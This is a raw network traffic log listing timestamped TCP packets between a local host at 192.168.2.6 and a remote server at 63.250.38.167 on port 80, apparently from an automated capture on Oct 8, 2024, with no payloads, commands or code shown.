Oct 8, 2024 11:32:16.669886112 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669894934 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669895887 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669904947 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669914007 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669914961 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669924021 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669934034 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669944048 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669953108 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669958115 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669964075 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669970989 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669972897 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669985056 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669994116 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669996977 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670002937 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670012951 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670022964 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670037031 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670046091 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670047045 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670078039 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670124054 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670134068 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670170069 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670203924 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670213938 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670222998 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670233011 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670243025 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670243979 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670264006 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670286894 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670289993 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670299053 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670309067 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670331955 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670341015 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670341015 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670350075 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670392990 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670397043 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670407057 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670417070 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670427084 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670438051 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670478106 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670506001 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670516014 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670525074 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670533895 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670542955 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670546055 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670552015 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670561075 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670572996 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670595884 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670717001 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670733929 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670747995 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670757055 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670768976 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670777082 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670778036 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670789003 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670790911 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670799017 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670808077 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670809984 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670816898 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670825005 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670826912 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670845985 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670847893 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670855999 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670864105 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670893908 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670909882 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670919895 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670934916 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670943975 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670954943 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670959949 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.670965910 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.670974016 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671008110 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671036959 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671046972 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671056032 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671077967 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671102047 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671112061 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671118021 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671128035 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671155930 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671160936 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671169996 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671180010 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671199083 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671210051 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671211958 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671219110 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.671236038 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.671264887 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:20.058389902 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:23.647881985 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:23.652842045 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:23.652925014 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:23.653172970 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:23.657932997 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.244524002 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.244540930 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.244550943 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.244599104 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.244965076 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245024920 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.245066881 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245078087 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245086908 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245098114 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245109081 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245115042 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.245120049 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.245157957 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.249572992 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.249617100 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.249627113 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.249708891 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.341233015 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341344118 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341356039 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341367960 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341378927 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341389894 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341440916 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.341495991 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.341756105 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341801882 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341876030 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341887951 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341898918 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341907978 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.341927052 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.341974020 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.342724085 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.342773914 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.342786074 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.342829943 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.342839956 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.342849970 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.342873096 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.342909098 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.343669891 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.343688965 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.343698978 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.343740940 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.343751907 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.343764067 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.343796968 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.346345901 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.346406937 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.421689987 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421710014 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421785116 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.421791077 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421835899 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421849012 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421866894 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421878099 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421890020 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421890020 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.421921015 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421931982 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421933889 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.421943903 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.421946049 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.421999931 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.429785013 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.429847002 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.429850101 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.429861069 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.429878950 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.429891109 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.429903030 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.429913998 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.429932117 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.430170059 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430181026 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430193901 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430229902 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.430258036 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430264950 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.430272102 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430283070 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430301905 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430314064 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430325985 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430335999 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.430336952 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.430387020 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.431041956 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431183100 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431194067 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431205034 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431216002 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431227922 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431238890 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431243896 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.431252003 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431263924 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431268930 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.431277037 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.431289911 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.431313992 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.432012081 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.432055950 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.432071924 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.432105064 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.435882092 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.510350943 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510375023 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510385990 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510397911 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510436058 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.510483027 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510502100 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.510612965 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510624886 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510636091 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510648012 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510658026 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510668039 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510672092 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.510679007 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.510721922 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.510756016 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.511284113 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511295080 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511306047 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511317015 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511328936 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511338949 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511349916 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511356115 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.511363029 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511373997 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.511409998 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.511434078 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.518390894 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518400908 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518412113 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518416882 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518428087 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518457890 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.518484116 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.518515110 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518542051 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518553019 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518603086 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.518610001 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518620014 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.518659115 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.518953085 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519001007 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519011021 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519018888 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.519057989 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.519123077 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519181013 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519191980 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519251108 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.519273043 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519284010 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519294024 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519304037 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519329071 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.519366980 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.519397974 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519407034 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519491911 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.519925117 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519936085 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519948006 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.519983053 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520009041 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520028114 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520039082 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520049095 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520059109 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520068884 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520078897 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520080090 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520091057 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520102024 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520104885 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520134926 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520159960 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520884991 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520896912 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520906925 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520922899 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520932913 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520942926 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.520945072 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.520991087 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599001884 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599014997 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599030972 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599041939 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599052906 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599088907 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599124908 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599148035 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599169970 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599220037 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599231005 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599241018 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599251986 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599262953 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599272966 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599273920 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599312067 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599325895 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599338055 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599338055 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.599349022 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599359989 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599370003 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599380970 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599396944 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.599417925 CEST	50005	80	192.168.2.6	63.250.38.167
